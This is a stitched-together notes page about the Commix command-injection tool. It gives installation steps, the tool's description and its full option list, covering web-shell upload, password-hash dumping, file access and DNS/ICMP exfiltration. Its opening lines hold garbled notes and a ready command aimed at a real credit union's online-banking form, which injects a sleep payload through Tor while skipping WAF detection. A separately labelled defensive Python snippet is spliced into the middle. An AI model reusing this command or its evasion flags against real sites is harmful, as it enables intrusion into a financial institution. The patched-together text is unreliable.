Commix ([comm]and [i]njection e[x]ploiter)

git clone https://github.com/stasinopoulos/commix.git commix

============= tor proxy=127.0.0.1:9050 but from one servak the fuck so two comics hapustaeshuyu need to think cunning how something

level=3 ignore-401 skip-waf tamper=

example ./commix.py -u https://www.communityfirst-yncu.com/Personal/ProductsAndServices/Borrowing/PersonalLoans/Apply/ data=LoginTag.ShowForm=form;start-sleep -s 5 #submit=Login to Online Banking level=3 ignore-401 skip-waf
============

Description

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers and security researchers to test web applications for bugs, errors or vulnerabilities related to command injection attacks. With this tool it is very easy to find and exploit command injection vulnerabilities in a given vulnerable parameter or string. Commix is written in the Python programming language.
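Added example, not from the original page or the Commix project: the kind of parameter handling this class of test looks for, next to a hardened form. It assumes a hypothetical handler that passes a request parameter (such as the pingme parameter used in the examples on this page) to ping; all function names are illustrative.

```python
import ipaddress
import re
import shlex
import subprocess

# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
SEPARATORS = {";", "|", "||", "&", "&&"}

def vulnerable_command(target: str) -> str:
    """'Before' form: the parameter is pasted into a string meant for a shell."""
    return "ping -c 1 " + target

def shell_commands(cmdline: str) -> list:
    """Split a command line at shell command separators (separators only)."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands

def safe_argv(target: str) -> list:
    """Hardened form: validate, then build an argument vector (no shell)."""
    try:
        ipaddress.ip_address(target)
        is_ip = "%" not in target  # refuse free-form IPv6 zone identifiers
    except ValueError:
        is_ip = False
    labels = target.split(".")
    is_host = len(target) <= 253 and all(LABEL.fullmatch(l) for l in labels)
    if not (is_ip or is_host):
        raise ValueError("target is not a hostname or IP address")
    # "--" ends option parsing, so the value can never be read as a flag.
    return ["ping", "-c", "1", "--", target]

def run_ping(target: str) -> int:
    """Run ping with shell=False; the value stays a single argument."""
    return subprocess.run(safe_argv(target), shell=False, timeout=10).returncode
```

The validation rejects values that begin with a hyphen as well, so a parameter such as `-s` cannot be interpreted as an option to the called program.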

Exploiting DVWA (1.0.8) command injection flaws.
Exploiting bWAPP command injection flaws (normal blind).
Exploiting Persistence blind command injection flaw.
Exploiting shellshock command injection flaws.
Upload a PHP shell (i.e. Metasploit PHP Meterpreter) on target host.
Upload a Weevely PHP web shell on target host.
Exploiting cookie-based command injection flaws.
Exploiting user-agent-based command injection flaws.
Exploiting referer-based command injection flaws.
Rack cookies and commands injection.

Homepage: https://github.com/stasinopoulos/commix
Author: Anastasios Stasinopoulos
License: GPLv3

Commix help

Usage: python commix.py [options]

Options:
  -h, --help           Show help and exit.

General: These parameters are common in different uses.

  --verbose            Enable verbose mode.
  --version            Show version number and exit.
  --output-dir=OUT…    Set user-defined output directory path.
  -s SESSION_FILE      Load a session from a saved (.sqlite) file.
  --flush-session      Clear session files for current target.
  --ignore-session     Ignore results saved in session file.

Target: These options are involved in defining the target URL.

  -u URL, --url=URL    Target URL.
  --url-reload         Reload the target URL after running the command.
  -l LOGFILE           Parse target and data from HTTP proxy log file.

Query: These options can be used to determine how to connect to the target URL.

  --data=DATA          Data string to send via POST.
  --host=HOST          HTTP Host header.
  --referer=REFERER    HTTP Referer header.
  --user-agent=AGENT   HTTP User-Agent header.
  --random-agent       Use a randomly selected HTTP User-Agent header.
  --param-del=PDEL     Set character to separate parameter values.
  --cookie=COOKIE      HTTP Cookie header.
  --cookie-del=CDEL    Set character to split cookie values.
  --headers=HEADERS    Additional headers (for example, 'Header1:Value1\nHeader2:Value2').
  --proxy=PROXY        Use HTTP proxy (for example 127.0.0.1:8080).
  --tor                Use the Tor network.
  --tor-port=TOR_P.    Set a Tor proxy port (default: 8118).
  --auth-url=AUTH_.    Login panel URL.
  --auth-data=AUTH.    Login parameters and data.
  --auth-type=AUTH.    HTTP authentication type (basic for example).
  --auth-cred=AUTH.    HTTP authentication credentials (for example admin:admin).
  --ignore-401         Ignore HTTP error 401 (Unauthorized).
  --force-ssl          Force SSL/HTTPS.

Listing: These options can be used to list the properties of the target host.

  --all                Get all.
  --current-user       Get the current user name.
  --hostname           Get the current hostname.
  --is-root            Check if the current user has root privileges.
  --is-admin           Check if the current user has root privileges.
  --sys-info           Get system information.
  --users              Get system users.
  --passwords          Get password hashes for system users.
  --privileges         Get system user privileges.
  --ps-version         Get PowerShell version number.

File Access: These options can be used to access files on the target host.

  --file-read=FILE…    Read the file from the target host.
  --file-write=FIL…    Write the file to the target host.
  --file-upload=FI…    Upload the file to the target host.
  --file-dest=FILE…    Absolute path on the host to write and/or upload.

Modules: These options can be used to increase detection and/or injection capabilities.

  --icmp-exfil=IP_.    The ICMP exfiltration injection technique (for example 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
  --dns-server=DNS.    DNS exfiltration injection module (domain name used for the DNS exfiltration attack).
  --shellshock         The shellshock injection technique.

Injection: These options can be used to specify which parameters to inject and to supply custom injection requests.

  -p TEST_PARAMETER    Parameter(s) to be tested.
  --suffix=SUFFIX      Suffix query string for injection.
  --prefix=PREFIX      Prefix query string for injection.
  --technique=TECH     Specify the technique(s) to inject.
  --maxlen=MAXLEN      Set the maximum output length for the time-based injection technique (Default: 10000 characters).
  --delay=DELAY        Set the delay time for the time-based injection technique (Default: 1 second).
  --tmp-path=TMP_P.    Set the absolute path of the web server's temporary directory.
  --root-dir=SRV_R..   Set the absolute path of the web server root directory.
  --alter-shell=AL…    Use an alternate OS shell (for example, Python).
  --os-cmd=OS_CMD      Execute a single operating system command.
  --os=OS              Force back-end operating system to this value.
  --tamper=TAMPER      Use the given script(s) to tamper with injection data.

Detection: These options can be used to set the detection phase.

  --level=LEVEL        Level of testing to be performed (1-3, Default: 1).

Miscellaneous:

  --dependencies       Check for third-party (non-core) dependencies.
  --skip-waf           Skip heuristic detection of WAF/IPS/IDS protection.

Examples of running Commix

Test the user-supplied pingme parameter (-u https://localhost/pingme/?pingme=hackware.ru) of the page https://localhost/pingme/:

sudo commix -u https://localhost/pingme/?pingme=hackware.ru

Test the user-supplied POST parameter name (--data="name=-s") of the page https://localhost/dvws/vulnerabilities/cmdi/client.php (-u https://localhost/dvws/vulnerabilities/cmdi/client.php):

sudo commix -u https://localhost/dvws/vulnerabilities/cmdi/client.php --data="name=-s"

You can see examples on different vulnerable environments at: https://github.com/stasinopoul

Installation in BlackArch

The program is preinstalled in BlackArch.
